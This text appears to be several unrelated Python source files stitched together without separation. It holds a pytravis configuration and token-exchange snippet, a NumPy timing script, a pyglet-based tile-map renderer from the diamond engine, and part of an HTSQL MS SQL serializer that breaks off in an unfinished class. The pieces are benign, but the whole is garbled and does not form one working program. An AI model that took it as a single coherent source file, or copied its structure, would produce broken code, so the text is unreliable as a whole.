# importing code fails fast.
conf_file = os.path.join(os.environ["HOME"], ".pytravisrc")
gh_token = False
auth_token = False

if os.path.exists(conf_file):
    conf = ConfigParser.ConfigParser()
    conf.read(conf_file)

    # Get API endpoints from the [URI] section; every *_uri value is
    # relative to base_url.
    try:
        urls = dict(conf.items('URI'))
        base_url = urls.get("base_url")
        repos_uri = base_url + urls.get("repos_uri")
        builds_uri = base_url + urls.get("builds_uri")
        log_uri = base_url + urls.get("log_uri")
        repos_by_owner = base_url + urls.get("repos_by_owner")
        auth_github = base_url + urls.get("auth_github")
        auth_handshake = base_url + urls.get("auth_handshake")
        users_uri = base_url + urls.get("users_uri")
    except ConfigParser.NoSectionError:
        raise RuntimeError("The configuration file doesn't seem to contain the \
Travis-CI URI endpoints.")

    # The [Auth] section is optional; without it we stay unauthenticated.
    try:
        gh_token = conf.get('Auth', 'github-token')
    except ConfigParser.NoSectionError:
        gh_token = False

    if gh_token:
        # Getting Travis-CI Authorization token by exchanging the GitHub one.
        post_tk = requests.post(auth_github, data={'github_token': gh_token})
        if post_tk.status_code == requests.codes.NOT_FOUND:
            raise AttributeError("Seems to be an error with the GitHub token, please \
check that the GitHub token is correctly placed in the configuration file")
        auth_token = json.loads(post_tk.content)
        # Ensure that Travis-CI has given access to pytravis.
        handshake = requests.get(auth_handshake)
        if handshake.status_code == requests.codes.NOT_FOUND:
            raise AttributeError("There was something wrong with Travis-CI Authentication, \
please check that your GitHub token is correctly placed in the configuration file")
else:
    # Fix: error message read "Not configuration file found".
    raise RuntimeError("No configuration file found, please ensure that you have \
a ~/.pytravisrc configuration file.")
#!/bin/python3
import time
import numpy as np

if __name__ == '__main__':
    # Show a small sample array first.
    print(np.arange(10))

    # Compare the cost of allocating a 5000x5000 zero grid with NumPy
    # against building the equivalent nested Python list.
    start = time.time()
    grid = np.zeros([5000, 5000])
    after_numpy = time.time()
    nested = [[0 for _ in range(5000)] for _ in range(5000)]
    after_lists = time.time()
    print(str(after_numpy - start), str(after_lists - after_numpy))

    # Element access on the NumPy grid works like on the nested list.
    grid[0][0] = 1
    print(grid[0][0])
# TODO
#
# @author Oktay Acikalin <oktay.acikalin@gmail.com>
# @copyright Oktay Acikalin
# @license MIT (LICENSE.txt)

# Tile-map rendering for the diamond/pyglet engine (Python 2 codebase):
# a TileMatrix node streams visible map data out of a Matrix, splits it
# into fixed-size TileMatrixSector batches grouped per z-layer
# (TileMatrixLayer), and creates/destroys sectors as the view scrolls.

import os
import sys
import ConfigParser
from collections import OrderedDict
from math import ceil, floor
import csv
from types import GeneratorType

from diamond import pyglet
from diamond.rect import Rect
from diamond.vault import Vault
from diamond.matrix import Matrix
from diamond.node import Node
from diamond.decorators import time
from diamond.clock import Timer


class DummyFrame(object):
    # Stand-in frame for the empty tile id (-1): zero-sized rect.

    rect = [0, 0, 0, 0]


class TileMatrixSector(object):
    """One rectangular chunk of tiles rendered as pyglet vertex lists.

    Holds one vertex list per tile sheet; positions are pushed into the
    vertex data directly (quads), and texture coordinates are looked up
    from the sheet vaults.
    """

    # TODO REWORK!!!
    # we need an index of all the sprites we place in the vertex list.
    # then we can modify vertex lists without sparse data.
    # replace operation would then replace in place..
    # remove operation would set the color and texture coords to 0.
    # set operation would search for an empty place or add a new one.
    # a periodic scan should remove all sparse data. perhaps user driven event?

    def __init__(self, vaults, batch, group, matrices, matrix_size, tile_size):
        super(TileMatrixSector, self).__init__()
        self._vaults = vaults
        self._tile_size = tile_size
        self._matrices = matrices
        self._matrix_size = matrix_size
        self._sprite_data = sprite_data = self._gather_sprite_data(matrices, vaults)
        self._vertex_lists = dict()
        self._opacity = 255
        self._rgb = (255, 255, 255)
        self._groups = dict()
        self._visible = True
        # One vertex list (4 vertices per tile quad) per sheet.
        for sheet, matrix in matrices.iteritems():
            vault = vaults[sheet]
            texture = vault.image.get_texture()
            # Setup sprite group.
            blend_src = pyglet.gl.GL_SRC_ALPHA
            blend_dest = pyglet.gl.GL_ONE_MINUS_SRC_ALPHA
            sprite_group = pyglet.sprite.SpriteGroup(texture, blend_src, blend_dest, group)
            self._groups[sheet] = sprite_group
            tex_coords = self._gather_tex_cords(matrix, sprite_data[sheet], texture.height)
            # print len(tex_coords)
            # print len(self._flat_data)
            num_coords = 4 * len(matrix)
            # print num_coords
            # Setup vertex list.
            self._batch = batch
            self._vertex_lists[sheet] = self._batch.add(
                num_coords, pyglet.gl.GL_QUADS,
                sprite_group,
                'v2i/dynamic',
                'c4B',
                ('t3f', tex_coords)
            )
            # Update color.
            r, g, b = self._rgb
            self._vertex_lists[sheet].colors[:] = [r, g, b, int(self._opacity)] * 4 * len(matrix)
            # print self._vertex_list
        # Setup position.
        self._x = 0
        self._y = 0
        self._rect = Rect(
            self._x, self._y,
            matrix_size[0] * tile_size[0],
            matrix_size[1] * tile_size[1],
        )
        self._update_position()

    def __del__(self):
        # Release GPU-side vertex data when the sector is garbage collected.
        # print('TileMatrixSector.__del__(%s)' % self)
        for vertex_list in self._vertex_lists.itervalues():
            if vertex_list is not None:
                vertex_list.delete()

    def _gather_sprite_data(self, matrices, vaults):
        # Map sheet -> {tile id -> frames}; -1 (empty tile) maps to a
        # zero-sized DummyFrame so lookups never fail.
        sprite_data = dict()
        for sheet, matrix in matrices.iteritems():
            vault = vaults[sheet]
            result = dict()
            ids = set(matrix.values())
            ids.discard(-1)
            for id in ids:
                result[id] = vault.get_sprite(str(id)).get_action('none').get_frames()
            result[-1] = [DummyFrame()]
            sprite_data[sheet] = result
        return sprite_data

    def _gather_tex_cords(self, matrix, sprite_data, texture_height):
        # Build the flat t3f texture-coordinate array, one quad per tile.
        coords = []
        for pos, id in matrix.iteritems():
            frame = sprite_data[id][0]  # TODO for now just take the first frame.
            # print pos, id, frame
            x, y, w, h = frame.rect
            # print frame.rect
            # Flip our y coord. TODO can't we do this somehow else?
            y = texture_height - y - h
            # bottom-left, bottom-right, top-right and top-left
            tex_coord = (
                x, y + h, 0.,  # bottom left
                x + w, y + h, 0.,  # bottom right
                x + w, y, 0.,  # top right
                x, y, 0.,  # top left
            )
            # print tex_coord
            coords.extend(tex_coord)
        return coords

    # @time
    def _update_position(self):
        # Rewrite every quad's vertices for the current origin; when hidden,
        # collapse all quads to zero-area instead of deleting them.
        x, y = self._x, self._y
        w, h = self._tile_size
        self._rect.x = x
        self._rect.y = y
        sprite_data = self._sprite_data
        if self._visible:
            for sheet, matrix in self._matrices.iteritems():
                vertices = []
                sprites = sprite_data[sheet]
                for pos, id in matrix.iteritems():
                    # print frame
                    s_w, s_h = sprites[id][0].rect[2:]
                    x1 = int(x) + pos[0] * w
                    y1 = int(y) + pos[1] * h
                    x2 = x1 + s_w
                    y2 = y1 + s_h
                    vertices.extend([x1, y1, x2, y1, x2, y2, x1, y2])
                self._vertex_lists[sheet].vertices[:] = vertices
        else:
            for sheet, matrix in self._matrices.iteritems():
                vertices = []
                sprites = sprite_data[sheet]
                for pos, id in matrix.iteritems():
                    # print frame
                    vertices.extend([0, 0, 0, 0, 0, 0, 0, 0])
                self._vertex_lists[sheet].vertices[:] = vertices

    def _set_x(self, x):
        if x != self._x:
            self._x = x
            self._update_position()

    x = property(lambda self: self._x, _set_x)

    def _set_y(self, y):
        if y != self._y:
            self._y = y
            self._update_position()

    y = property(lambda self: self._y, _set_y)

    def set_position(self, x, y):
        self._x, self._y = x, y
        self._update_position()

    position = property(lambda self: (self._x, self._y), lambda self, pos: self.set_position(*pos))

    rect = property(lambda self: self._rect)

    # @time
    def _set_visible(self, visible):
        if self._visible != visible:
            self._visible = visible
            self._update_position()

    visible = property(lambda self: self._visible, _set_visible)

    @time
    def set_tile(self, x, y, id):
        """Swap the texture of one tile in place.

        ``id`` is '<sheet>/<tile id>'; only the 12 texture-coordinate
        floats of that tile's quad are patched.
        """
        s_x, s_y, s_w = x, y, self._matrix_size[0]
        sheet, id = id.split('/')
        sprite_data = self._sprite_data[sheet]
        vault = self._vaults[sheet]
        if id not in sprite_data:
            sprite_data[id] = vault.get_sprite(str(id)).get_action('none').get_frames()
        frame = sprite_data[id][0]  # TODO for now just take the first frame.
        # print frame
        x, y, w, h = frame.rect
        # print frame.rect
        # bottom-left, bottom-right, top-right and top-left
        tex_coord = [
            x, y + h, 0.,  # bottom left
            x + w, y + h, 0.,  # bottom right
            x + w, y, 0.,  # top right
            x, y, 0.,  # top left
        ]
        # print 1, tex_coord
        # print 2, s_x, s_y, s_w
        # 12 floats per quad (4 vertices x 3 components) -> flat offset.
        pos = (s_w * s_y * 12 + s_x * 12)
        # print 3, len(self._vertex_list.tex_coords), pos
        vertex_list = self._vertex_lists[sheet]
        tex_coords = vertex_list.tex_coords
        tex_coords = tex_coords[:pos] + tex_coord + tex_coords[pos + 12:]
        # print 4, len(tex_coords)
        vertex_list.tex_coords[:] = tex_coords


class TileMatrixLayer(Node):
    """Scene node holding the sectors of one z-layer of a TileMatrix."""

    def __init__(self, suborder_id, vaults):
        super(TileMatrixLayer, self).__init__()
        # print 'TileMatrixLayer.__init__', self, suborder_id
        self.order_id = suborder_id
        self._vaults = vaults
        # sector id -> (x, y, TileMatrixSector)
        self._sectors = dict()

    # def _set_suborder_id(self, id):
    #     self._suborder_id = id
    #     # TODO Update group id of this node by placing id after the comma of the node.
    # suborder_id = property(lambda self: self._suborder_id, _set_suborder_id)

    def has_sector(self, id):
        return id in self._sectors

    # @time
    def add_sector(self, id, x, y, matrices, matrix_size, tile_size):
        # Builds the sector's vertex lists immediately, so the node must
        # already be attached to a window (needs its batch and group).
        batch = self.window._batch
        group = self._group
        # for sheet, matrix in matrices.iteritems():
        #     print 'sheet', sheet, matrix
        # print 'sector real pos =', self._x_real, self._y_real
        sector = TileMatrixSector(self._vaults, batch, group, matrices, matrix_size, tile_size)
        sector.visible = self._inherited_visibility
        # sector.set_position(self._x_real + x, self._y_real + y)
        sector.set_position(x, y)
        self._sectors[id] = (x, y, sector)

    # @time
    def remove_sector(self, id):
        # Dropping the last reference lets TileMatrixSector.__del__ free the
        # vertex lists.
        del self._sectors[id]

    def _set_visible(self, visible):
        super(TileMatrixLayer, self)._set_visible(visible)
        for x, y, sector in self._sectors.itervalues():
            sector.visible = self._inherited_visibility

    # @time
    # def _update_real_position(self):
    #     super(TileMatrixLayer, self)._update_real_position()
    #     # print len(self._sectors)
    #     for x, y, sector in self._sectors.itervalues():
    #         # print x, y, sector
    #         old_pos = sector.position
    #         # new_pos = self._x_real + x, self._y_real + y
    #         new_pos = x, y
    #         if new_pos != old_pos:
    #             sector.set_position(*new_pos)


class TileMatrix(Node):
    """Scrolling tile map node.

    Loads tile sheets and matrix data (directly or via a config file),
    then keeps exactly the sectors overlapping the window alive as the
    node moves (see update_sectors/_update_real_position).
    """

    def __init__(self):
        super(TileMatrix, self).__init__()
        self.__config = ConfigParser.ConfigParser()
        self.__vaults = dict()
        self.__default_sheet = None
        self.__tile_size = 32, 32  # Never go less than 4x4 or doom awaits you!
        self.__sector_size = 10, 10  # Default for visual sectors.
        self.__matrix = Matrix()
        # For debugging. DISABLE ME!
        # self.__matrix.set_default_value({0: '72'})
        self.__layers = dict()
        self.__layer_config = dict()
        # ((map grid pos), (raw coords)) of the last scroll update.
        self.__last_map_pos = (None, None), (None, None)
        self.__last_matrix_rect = None

    def add_sheet(self, sheet_vault, alias=None):
        """Register a tile sheet; the first sheet fixes the tile size."""
        if not self.__vaults:
            self.__tile_size = sheet_vault.tile_size
            t_w, t_h = self.__tile_size
            if t_w < 4 or t_h < 4:
                raise Exception('Tile size cannot be smaller than 4x4. Current size: %dx%d' % (t_w, t_h))
        else:
            if sheet_vault.tile_size != self.__tile_size:
                raise Exception('Cannot load sheet vault with incompatible tile size: %s' % sheet_vault)
        vault = Vault.get_instance(sheet_vault)
        alias = sheet_vault.__name__ if alias is None else alias
        self.__vaults[alias] = vault
        filename = os.path.relpath(sheet_vault.__file__, os.getcwd())
        filename = os.path.splitext(filename)[0]  # Throw away extension - Python shall decide.
        if not self.__config.has_section('tilesheets'):
            self.__config.add_section('tilesheets')
        self.__config.set('tilesheets', alias, filename)
        if not self.__default_sheet:
            self.__default_sheet = self.__vaults.keys()[0]

    def load_matrix(self, path):
        """Point the backing Matrix at its on-disk data directory."""
        self.__matrix.data_path = path
        if not self.__config.has_section('matrix'):
            self.__config.add_section('matrix')
        self.__config.set('matrix', 'data_path', path)

    def load_sheet_file(self, filename, alias=None):
        # Imports the sheet as a Python module; its directory is prepended
        # to sys.path so the import can resolve.
        sheet_path = os.path.dirname(filename)
        sheet_file = os.path.basename(filename)
        if sheet_path:
            sys.path.insert(0, os.path.abspath(sheet_path))
        sheet_file = os.path.splitext(sheet_file)[0]  # Throw away extension - Python shall decide.
        module = __import__(sheet_file, globals(), locals(), [], -1)
        self.add_sheet(module, alias)

    def load_config(self, filename):
        """Load sheets, matrix path and layer options from an INI file."""
        # TODO do we need to reset everything here or can we block somehow if something has been set?
        config = self.__config
        config.read(filename)
        # All paths in the file are relative to the file itself.
        base_dir = os.path.dirname(filename)
        for section in config.sections():
            if section == 'tilesheets':
                for alias, filename in config.items('tilesheets'):
                    filename = os.path.join(base_dir, filename)
                    self.load_sheet_file(filename, alias)
            elif section == 'matrix':
                for key, val in config.items('matrix'):
                    if key == 'data_path':
                        val = os.path.join(base_dir, val)
                        self.load_matrix(val)
                    else:
                        raise Exception('Unknown key for section matrix found: %s' % key)
            elif section == 'layer.order_change':
                for z, new_z in config.items('layer.order_change'):
                    z = int(z)
                    new_z = int(new_z)
                    try:
                        self.__layer_config[z]['reorder'] = new_z
                    except KeyError:
                        self.__layer_config[z] = dict(reorder=new_z)
            elif section == 'layer.sector':
                for key, val in config.items('layer.sector'):
                    if key == 'size':
                        val = tuple(map(int, val.split(',')))
                        self.__sector_size = val
                    elif key == 'cache_path':
                        val = os.path.join(base_dir, val)
                        self._sector_cache_path = val
                        if not os.path.exists(val):
                            os.makedirs(val)
            # We just ignore unknown sections.
            # else:
            #     raise Exception('Unknown section in config file found: %s' % section)
        # config.write(sys.stdout)

    # @time
    def update_sectors(self):
        """Create sectors covering the window and drop off-screen ones.

        No-ops when the covered matrix rect has not changed since the
        last call.
        """
        # timer = Timer()
        # timer.start()
        # Gather the boundaries.
        m_x, m_y = map(float, self.real_position)  # real position of tilematrix
        t_w, t_h = map(float, (self.__tile_size))  # tile size
        s_w, s_h = map(float, (self.__sector_size))  # sector size
        w_w, w_h = map(float, (self.window.width, self.window.height))  # window size
        # m_w, m_h = map(int, (ceil(w_w / t_w), ceil(w_h / t_h)))  # map size
        # Calculate all necessary sector rects.
        top_left = map(floor, (-m_x / t_w, -m_y / t_h))
        bottom_right = map(ceil, ((-m_x + w_w) / t_w, (-m_y + w_h) / t_h))
        o_x, o_y = ceil(top_left[0] % s_w / s_w) * s_w, ceil(top_left[1] % s_h / s_h) * s_h
        m_w, m_h = (bottom_right[0] - top_left[0] + o_x), (bottom_right[1] - top_left[1] + o_y)
        # m_w, m_h = (bottom_right[0] - top_left[0]), (bottom_right[1] - top_left[1])
        s_num_w, s_num_h = map(ceil, (m_w / s_w, m_h / s_h))
        # print(m_x, t_w, m_y, t_h)
        # print('tl =', top_left)
        # print(m_x, w_w, t_w, m_y, w_h, t_h)
        # print('br =', bottom_right)
        # print('s_w, s_h =', s_w, s_h)
        # print('o_x, o_y =', o_x, o_y)
        # print('num horiz tiles =', m_w)
        # print('num vert tiles =', m_h)
        # print('num horiz sectors =', s_num_w)
        # print('num vert sectors =', s_num_h)
        # And make them ints.
        top_left = map(int, top_left)
        bottom_right = map(int, bottom_right)
        t_w, t_h = map(int, (t_w, t_h))
        m_w, m_h = map(int, (m_w, m_h))
        s_w, s_h = map(int, (s_w, s_h))
        s_num_w, s_num_h = map(int, (s_num_w, s_num_h))
        # Guess our default if no sheet is being mentioned in a coord.
        default_sheet = self.__default_sheet
        # timer.stop()
        # print 1, timer.result
        # timer.start()
        matrix_rect = (
            top_left[0] // s_w * s_w,
            top_left[1] // s_h * s_h,
            s_w * s_num_w,
            s_h * s_num_h,
        )
        if matrix_rect == self.__last_matrix_rect:
            return
        self.__last_matrix_rect = matrix_rect
        # Get the rect.
        matrix_layers = self.__matrix.get_rect(*matrix_rect)
        # print matrix_layers
        # timer.stop()
        # print 2, timer.result
        # timer.start()
        # Separate layer and sector data.
        layer_data = dict()
        for layer_no, matrix in matrix_layers.iteritems():
            # Ensure layer.
            try:
                layer_matrix = layer_data[layer_no]
            except KeyError:
                layer_matrix = layer_data[layer_no] = dict()
            for (x, y), id in matrix.iteritems():
                # Split absolute tile coords into (sector pos, in-sector pos).
                pos_x = x // s_w
                x = x % s_w
                pos_y = y // s_h
                y = y % s_h
                # print '*** sector', pos_x, pos_y
                # Separate data.
                # DISABLE THIS AFTER DEBUGGING!
                # if (x, y) == (0, 0):
                #     col = {0: '73'}
                # print x, y, col
                # Normalize data format.
                if '/' in id:
                    sheet, id = id.split('/', 1)
                else:
                    sheet = default_sheet
                # Ensure sector.
                try:
                    sector_matrix = layer_matrix[(pos_x, pos_y)]
                except KeyError:
                    sector_matrix = layer_matrix[(pos_x, pos_y)] = {
                        sheet: {
                            (x, y): id
                        }
                    }
                else:
                    # Set sector data.
                    try:
                        sector_matrix[sheet][x, y] = id
                    except KeyError:
                        sector_matrix[sheet] = {(x, y): id}
        # timer.stop()
        # print 3, timer.result
        # timer.start()
        # Build layers and sectors.
        layers = self.__layers
        vaults = self.__vaults
        required_sectors = set()
        for order_id, layer_data in layer_data.items():
            # print 'layer', order_id
            try:
                layer = layers[order_id]
            except KeyError:
                if order_id in self.__layer_config:
                    _order_id = self.__layer_config[order_id].get('reorder', order_id)
                else:
                    _order_id = order_id
                layer = layers[order_id] = TileMatrixLayer(_order_id, vaults)
                # print layer
                # We do this because we need a valid window and group for the next step.
                self.add_node(layer)
            for pos, sector_data in layer_data.iteritems():
                if not layer.has_sector(pos):
                    # print 12345, top_left, pos
                    x = pos[0] * t_w * s_w
                    y = pos[1] * t_h * s_h
                    # print 'sector', pos, x, y
                    layer.add_sector(pos, x, y, sector_data, self.__sector_size, self.__tile_size)
                required_sectors.add((order_id, pos))
        # timer.stop()
        # print 4, timer.result
        # timer.start()
        # return
        # print(required_sectors)
        # Cleanup sectors which are off the screen.
        for order_id, layer in layers.items():
            for id, data in layer._sectors.items():
                x, y, sector = data
                # pos = sector.position
                sector_id = (order_id, (x // (t_w * s_w), y // (t_h * s_h)))
                # print sector_id
                if sector_id not in required_sectors:
                    # print('***********', id, data, pos, (w_w, w_h), (-t_w * s_w, -t_h * s_h))
                    # print('drop', id)
                    layer.remove_sector(id)
        # timer.stop()
        # print 5, timer.result

    # @time
    def rebuild(self):
        """Drop all layers/sectors and rebuild from the current view."""
        # Throw away old layers.
        self.remove_all()
        self.__layers.clear()
        self.__last_map_pos = (None, None), (None, None)
        self.__last_matrix_rect = None
        self.update_sectors()

    # @time
    def add_to(self, node):
        super(TileMatrix, self).add_to(node)
        if not self._child_nodes:
            self.rebuild()
        # self._update_real_position()

    def set_sector_size(self, width, height):
        self.__sector_size = width, height
        if self.window:
            self.rebuild()

    # @time
    def _update_real_position(self):
        # Called on movement: re-derives the map grid position and only
        # refreshes sectors when it crosses a tile boundary.
        super(TileMatrix, self)._update_real_position()
        if not self.window:
            return
        x, y = map(lambda v: -v, self.real_position)
        t_w, t_h = self.__tile_size
        # s_w, s_h = self.__sector_size
        w = t_w  # * s_w
        h = t_h  # * s_h
        last_map_pos, last_map_coords = self.__last_map_pos
        # Round away from the previous position so a jitter around a tile
        # border does not flip-flop the grid position.
        # NOTE(review): last_map_coords starts as (None, None); the `>`
        # comparison with None relies on Python 2 semantics.
        if x > last_map_coords[0]:
            crp_x = ceil(x / float(w))
        else:
            crp_x = floor(x / float(w))
        if y > last_map_coords[1]:
            crp_y = ceil(y / float(h))
        else:
            crp_y = floor(y / float(h))
        cur_map_pos = crp_x, crp_y
        # print (cur_map_pos, (x, y)), self.__last_map_pos
        if last_map_pos != cur_map_pos:
            # print (cur_map_pos, (x, y)), self.__last_map_pos
            self.update_sectors()
        self.__last_map_pos = cur_map_pos, (x, y)

    # @time
    def get_layer(self, z):
        """Return (creating on demand) the layer node for z-index z."""
        layers = self.__layers
        vaults = self.__vaults
        try:
            layer = layers[z]
        except KeyError:
            if z in self.__layer_config:
                order = self.__layer_config[z].get('reorder', z)
            else:
                order = z
            layer = layers[z] = TileMatrixLayer(order, vaults)
            # print layer
            self.add_node(layer)
        return layer

    def translate_to_pos(self, x, y):
        # Tile coords -> pixel coords.
        tile_size = self.__tile_size
        return x * tile_size[0], y * tile_size[1]

    def get_boundaries(self):
        # Matrix boundaries scaled to pixel coords.
        left, top, right, bottom = self.__matrix.boundaries
        t_w, t_h = self.__tile_size
        return left * t_w, top * t_h, right * t_w, bottom * t_h

    def get_tile_id_at(self, x, y, z):
        # Copies dict values so callers cannot mutate matrix data.
        value = self.__matrix.get_point(x, y, z)
        if value is not None:
            if type(value) is dict:
                return value.copy()
            else:
                return value
        return None

    @time
    def set_tiles_at(self, points):
        # NOTE(review): incomplete -- groups the points per layer but the
        # actual sector/matrix update is still TODO.
        if type(points) is GeneratorType:
            points = set(tuple(point) for point in points)
        layer_data = dict(
            (z, filter(lambda point: point[2] == z, points))
            for _, _, z, _ in points
        )
        print layer_data
        for layer_no, points in layer_data.iteritems():
            layer = self.get_layer(layer_no)
            # TODO Generate sheet and sector data.
            # TODO Modify existing sectors or create new ones.
            # TODO modify matrix.

    # TODO rework to react on matrix.data.saved event!
    def _rebuild_index(self):
        # Regenerates the i.*.csv per-tile/per-sheet index files and the
        # b.csv boundaries file from the s.*.csv sector files.
        # NOTE(review): reads self._sector_size/self._data_path, which are
        # not set anywhere in this class -- looks like this method belongs
        # on the Matrix side; confirm before calling.
        s_w, s_h = self._sector_size
        print('Rebuilding matrix index...')
        for root, dirs, files in os.walk(self._data_path):
            for filename in files:
                if filename.startswith('i.') and filename.endswith('.csv'):
                    os.remove(os.path.join(root, filename))
        indexes = dict()
        top, left, bottom, right = 0, 0, 0, 0
        for root, dirs, files in os.walk(self._data_path):
            files = sorted(files)
            # print(root, dirs, files)
            print('Found %d sectors to index...' % len(files))
            for filename in files:
                if not (filename.startswith('s.') and filename.endswith('.csv')):
                    continue
                # print('Inspecting sector file: %s' % filename)
                reader = csv.reader(open(os.path.join(root, filename)), skipinitialspace=True)
                s_x, s_y = map(int, filename[2:-4].split(','))
                for x, y, z, id in reader:
                    x = (s_x * s_w) + int(x)
                    y = (s_y * s_h) + int(y)
                    top = min(top, y)
                    left = min(left, x)
                    bottom = max(bottom, y)
                    right = max(right, x)
                    # TODO track z axis min and max.
                    sheet, tile_id = id.split('/')
                    # Update index of specific tile.
                    if id not in indexes:
                        id_ = '%s,%s' % (sheet, tile_id)
                        index_filename = os.path.join(self._data_path, 'i.%s.csv' % id_)
                        indexes[id] = csv.writer(open(index_filename, 'w'))
                    indexes[id].writerow((x, y, z))
                    # Update index of used tilesheet.
                    if sheet not in indexes:
                        index_filename = os.path.join(self._data_path, 'i.%s.csv' % sheet)
                        indexes[sheet] = csv.writer(open(index_filename, 'w'))
                    indexes[sheet].writerow((x, y, z, tile_id))
        index_filename = os.path.join(self._data_path, 'b.csv')
        writer = csv.writer(open(index_filename, 'w'))
        writer.writerow((top, left, bottom, right))
        self._top, self._left, self._bottom, self._right = top, left, bottom, right
        print('Finished rebuilding matrix index.')

    def find_in_matrix_by_tilesheet(self, value):
        """Look up tile positions from an i.*.csv index file.

        ``value`` is either a sheet alias or '<sheet>/<tile id>'.
        """
        if '/' in value:
            value = '%s,%s' % tuple(value.split('/'))
        index_filename = os.path.join(self.__matrix.data_path, 'i.%s.csv' % value)
        if os.path.exists(index_filename):
            reader = csv.reader(open(index_filename))
            return [map(int, row[:3]) + row[3:] for row in reader]
        else:
            return []
#
# Copyright (c) 2006-2013, Prometheus Research, LLC
#

"""
MS SQL Server SQL serializer: adapts the generic HTSQL dumping machinery
to T-SQL (bracketed identifiers, ``TOP`` instead of ``LIMIT``, CASE-based
boolean emulation, DATETIME-based date/time arithmetic).
"""

from htsql.core.adapter import adapt
from htsql.core.error import Error
from htsql.core.domain import (BooleanDomain, TextDomain, IntegerDomain,
        DecimalDomain, DateDomain, TimeDomain, DateTimeDomain)
from htsql.core.tr.frame import ColumnPhrase, ReferencePhrase, LiteralPhrase
from htsql.core.tr.dump import (FormatName, FormatPlaceholder, DumpBranch,
        DumpBySignature, DumpFromPredicate, DumpToPredicate,
        DumpIsTotallyEqual, DumpBoolean, DumpInteger, DumpDecimal, DumpFloat,
        DumpDate, DumpTime, DumpDateTime, DumpToInteger, DumpToFloat,
        DumpToDecimal, DumpToText, DumpToDate, DumpToTime, DumpToDateTime)
from htsql.core.tr.fn.dump import (DumpRound, DumpRoundTo, DumpTrunc,
        DumpTruncTo, DumpLength, DumpConcatenate, DumpSubstring, DumpTrim,
        DumpToday, DumpNow, DumpExtractYear, DumpExtractMonth,
        DumpExtractDay, DumpExtractHour, DumpExtractMinute,
        DumpExtractSecond, DumpMakeDate, DumpMakeDateTime,
        DumpDateIncrement, DumpDateDecrement, DumpDateTimeIncrement,
        DumpDateTimeDecrement, DumpDateDifference)
import math


class MSSQLFormatName(FormatName):
    # T-SQL quotes identifiers with square brackets; a literal `]` is
    # escaped by doubling it.

    def __call__(self):
        self.stream.write(u"[%s]" % self.value.replace(u"]", u"]]"))


class MSSQLFormatPlaceholder(FormatPlaceholder):
    # Positional parameter placeholder.

    def __call__(self):
        self.stream.write(u"%s")


class MSSQLDumpBranch(DumpBranch):
    # SELECT serializer: MS SQL has no LIMIT clause, so the limit is
    # emitted as `TOP <n>` right after SELECT.

    def dump_select(self):
        aliases = self.state.select_aliases_by_tag[self.frame.tag]
        self.write(u"SELECT ")
        self.indent()
        if self.frame.limit is not None:
            self.write(u"TOP "+unicode(self.frame.limit))
        self.newline()
        for index, phrase in enumerate(self.frame.select):
            alias = None
            if self.state.hook.with_aliases:
                alias = aliases[index]
                # Drop the alias when it would merely repeat the column
                # name or the referenced select alias.
                if isinstance(phrase, ColumnPhrase):
                    if alias == phrase.column.name:
                        alias = None
                if isinstance(phrase, ReferencePhrase):
                    target_alias = (self.state.select_aliases_by_tag
                                            [phrase.tag][phrase.index])
                    if alias == target_alias:
                        alias = None
            if alias is not None:
                self.format("{selection} AS {alias:name}",
                            selection=phrase, alias=alias)
            else:
                self.format("{selection}",
                            selection=phrase)
            if index < len(self.frame.select)-1:
                self.write(u",")
            self.newline()
        self.dedent()

    def dump_limit(self):
        # The limit is already emitted as TOP in dump_select();
        # OFFSET is not supported by this backend.
        assert self.frame.offset is None


class MSSQLDumpFromPredicate(DumpFromPredicate):
    # Predicate -> 0/1 value; a nullable predicate must preserve NULL,
    # hence the branch without an ELSE.

    def __call__(self):
        if self.phrase.is_nullable:
            self.format("(CASE WHEN {op} THEN 1 WHEN NOT {op} THEN 0 END)",
                        self.arguments)
        else:
            self.format("(CASE WHEN {op} THEN 1 ELSE 0 END)",
                        self.arguments)


class MSSQLDumpToPredicate(DumpToPredicate):
    # 0/1 value -> predicate.

    def __call__(self):
        self.format("({op} <> 0)", self.arguments)


class MSSQLDumpBoolean(DumpBoolean):
    # Boolean literals are plain 1/0.

    def __call__(self):
        if self.value is True:
            self.write(u"1")
        if self.value is False:
            self.write(u"0")


class MSSQLDumpInteger(DumpInteger):
    # Integer literal; values outside INT range are cast to BIGINT, and
    # negative literals are parenthesized to avoid `- -` ambiguities.

    def __call__(self):
        if not (-2**63 <= self.value < 2**63):
            raise Error("Got invalid integer value")
        if abs(self.value) < 2**31:
            if self.value >= 0:
                self.write(unicode(self.value))
            else:
                self.write(u"(%s)" % self.value)
        else:
            self.write(u"CAST(%s AS BIGINT)" % self.value)


class MSSQLDumpFloat(DumpFloat):
    # Float literal; force exponent notation so T-SQL parses it as FLOAT
    # rather than DECIMAL.

    def __call__(self):
        assert not math.isinf(self.value) and not math.isnan(self.value)
        value = repr(self.value)
        if 'e' not in value and 'E' not in value:
            value = value+'e0'
        if value[0] == '-':
            value = "(%s)" % value
        self.write(unicode(value))


class MSSQLDumpDecimal(DumpDecimal):
    # Decimal literal; force a `.` so T-SQL parses it as DECIMAL, and
    # cast exponent notation explicitly.

    def __call__(self):
        assert self.value.is_finite()
        value = str(self.value)
        if 'E' in value:
            value = "CAST(%s AS DECIMAL(38,19))" % value
        elif '.' not in value:
            value = "%s." % value
        if value[0] == '-':
            value = "(%s)" % value
        self.write(unicode(value))


class MSSQLDumpDate(DumpDate):
    # Dates are stored as DATETIME values.

    def __call__(self):
        self.format("CAST({value:literal} AS DATETIME)",
                    value=unicode(self.value))


class MSSQLDumpTime(DumpTime):
    # A time literal is encoded as a FLOAT fraction of a day, matching
    # DATETIME arithmetic.

    def __call__(self):
        value = (self.value.hour*3600 + self.value.minute*60 +
                 self.value.second + self.value.microsecond/1000000.0) / 86400.0
        value = repr(value)
        if 'e' not in value and 'E' not in value:
            value = value+'e0'
        self.write(unicode(value))


class MSSQLDumpDateTime(DumpDateTime):

    def __call__(self):
        # DATETIME is timezone-naive and has only millisecond precision.
        value = self.value.replace(tzinfo=None)
        if not value.microsecond:
            value = unicode(value)
        else:
            value = unicode(value)[:-3]
        self.format("CAST({value:literal} AS DATETIME)", value=value)


class MSSQLDumpToInteger(DumpToInteger):

    def __call__(self):
        self.format("CAST({base} AS INT)", base=self.base)


class MSSQLDumpToFloat(DumpToFloat):

    def __call__(self):
        self.format("CAST({base} AS FLOAT)", base=self.base)


class MSSQLDumpToDecimal(DumpToDecimal):

    def __call__(self):
        self.format("CAST({base} AS DECIMAL(38,19))", base=self.base)


class MSSQLDumpIntegerToDecimal(MSSQLDumpToDecimal):
